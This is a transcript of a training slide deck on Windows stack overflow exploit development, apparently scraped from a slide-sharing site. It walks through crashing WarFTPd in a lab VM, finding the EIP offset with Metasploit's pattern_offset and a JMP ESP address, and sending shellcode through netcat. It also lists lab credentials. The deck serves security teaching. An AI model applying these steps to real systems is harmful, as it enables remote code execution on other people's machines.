Presentation is loading. Please wait.

Presentation is loading. Please wait.

Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray

Published byLaurence Booth Modified over 9 years ago

Similar presentations

Presentation on theme: "Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray"— Presentation transcript:

1 Strategic Security, Inc. © http://www.strategicsec.com/ Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray joe@strategicsec.com http://www.linkedin.com/in/joemccray http://twitter.com/j0emccray

2 Strategic Security, Inc. © http://www.strategicsec.com/ Windows Stack Overflow Walk-Through

3 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows 1.Power off the asterisk VM. 2.Extract and boot the XPIE8 VM. (Boot First option) (Administrator:strategicsec) 3. Start WarFTPd 4. Start WinDBG 5. Press F6 6. attach to war-ftpd.exe Open warftpd1.py in Notepad++. From the XP Host command print we will trigger a crash: > python warftpd1.py | nc victim_ip 21

4 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows At WINDBG prompt “r” to show registers or “alt+4” EIP should be 41414141 ESP should be full of 41s In WinDBG command prompt type: dd eip dd esp

5 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows Start WarFTPd Start WinDBG Press F6 attach to war-ftpd.exe at the WINDBG prompt "F5" to start the debugger Debugger is running Open warftpd2.py in Notepad++ From your XP HOST command prompt - trigger the crash: python warftpd2.py | nc victim_ip_addr 21

6 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows Eip: 32714131 esp: affd58 Now we need SSH into the StrategicSec-Ubuntu host (strategicsec:strategicsec) $ cd /home/strategicsec/toolz/metasploit/tools $ ruby pattern_offset.rb 32714131 485 $ ruby pattern_offset.rb 71413471 493 $ cd /home/strategicsec/toolz/metasploit $./msfpescan –j ESP DLLs/xpsp3/shell32.dll

7 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows Open warftpd3.py with Notepad++ Fill in the appropriate values Distance to EIP Address of JMP ESP Open a command prompt on our host Python warftpd3.py | nc victim_ip 21 dd eip & dd esp

8 Strategic Security, Inc. © http://www.strategicsec.com/ Let's Attack Windows Open warftpd4.py in Notepad++. Copy the shell code into warftpd4.py ‘shellcode’ variable. Run warftpd4.py > python warftpd4.py | nc victim_IP 21

9 Strategic Security, Inc. © http://www.strategicsec.com/ Contact Me.... Toll Free:1-866-892-2132 Email:joe@strategicsec.com Twitter:http://twitter.com/j0emccray LinkedIn: http://www.linkedin.com/in/joemccray

Download ppt "Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray"

Similar presentations

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
GROUP 2 WINDOWS INTERNALS TOOLS & WINDOWS SDK DEBUGGING TOOLS David Denhollander Kevin Finkler Corey Sarnia Ailun Shen.

GROUP 2 WINDOWS INTERNALS TOOLS & WINDOWS SDK DEBUGGING TOOLS David Denhollander Kevin Finkler Corey Sarnia Ailun Shen.
Use After Free Defcon Russia # 14 21 Feb. 2012

Use After Free Defcon Russia # Feb. 2012
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
91.661 Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.

Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Chalmers University of Technology Language-based Security Internet Explorer Exploit Christian O. Andersson Jonas Stiborg Andén.

Chalmers University of Technology Language-based Security Internet Explorer Exploit Christian O. Andersson Jonas Stiborg Andén.
Java Programming Working with TextPad. Using TextPad to Work with Java This text editor is designed for working with Java You can download a trial version.

Java Programming Working with TextPad. Using TextPad to Work with Java This text editor is designed for working with Java You can download a trial version.
Buffer Overflow sailaja yagnavajhala sailaja yagnavajhala.

Buffer Overflow sailaja yagnavajhala sailaja yagnavajhala.
UPLOADING YOUR SERVER CODE TO YOUR VIRTUAL MACHINE.

UPLOADING YOUR SERVER CODE TO YOUR VIRTUAL MACHINE.
Engineering H192 - Computer Programming The Ohio State University Gateway Engineering Education Coalition Lect 4P. 1Winter Quarter Introduction to UNIX.

Engineering H192 - Computer Programming The Ohio State University Gateway Engineering Education Coalition Lect 4P. 1Winter Quarter Introduction to UNIX.
Streaming Twitter. Install pycurl library Use a lab computer From the course website Download the links from pycurl and twitter streamer Extract site-packages.zip,

Streaming Twitter. Install pycurl library Use a lab computer From the course website Download the links from pycurl and twitter streamer Extract site-packages.zip,
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.

Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
The Python interpreter CSE 140 University of Washington Michael Ernst.

The Python interpreter CSE 140 University of Washington Michael Ernst.
Part 3: Advanced Dynamic Analysis Chapter 8: Debugging.

Part 3: Advanced Dynamic Analysis Chapter 8: Debugging.
Logging into the linux machines This series of view charts show how to log into the linux machines from the Windows environment. Machine name IP address.

Logging into the linux machines This series of view charts show how to log into the linux machines from the Windows environment. Machine name IP address.
Mitigation of Buffer Overflow Attacks

Mitigation of Buffer Overflow Attacks
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.

Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
Strategic Security, Inc. © Introduction To SQL Injection Presented By: Joe McCray

Strategic Security, Inc. © Introduction To SQL Injection Presented By: Joe McCray
1 Application Security: Electronic Commerce and E-Mail Chapter 9 Copyright 2003 Prentice-Hall.

1 Application Security: Electronic Commerce and Chapter 9 Copyright 2003 Prentice-Hall.

Similar presentations

Ads by Google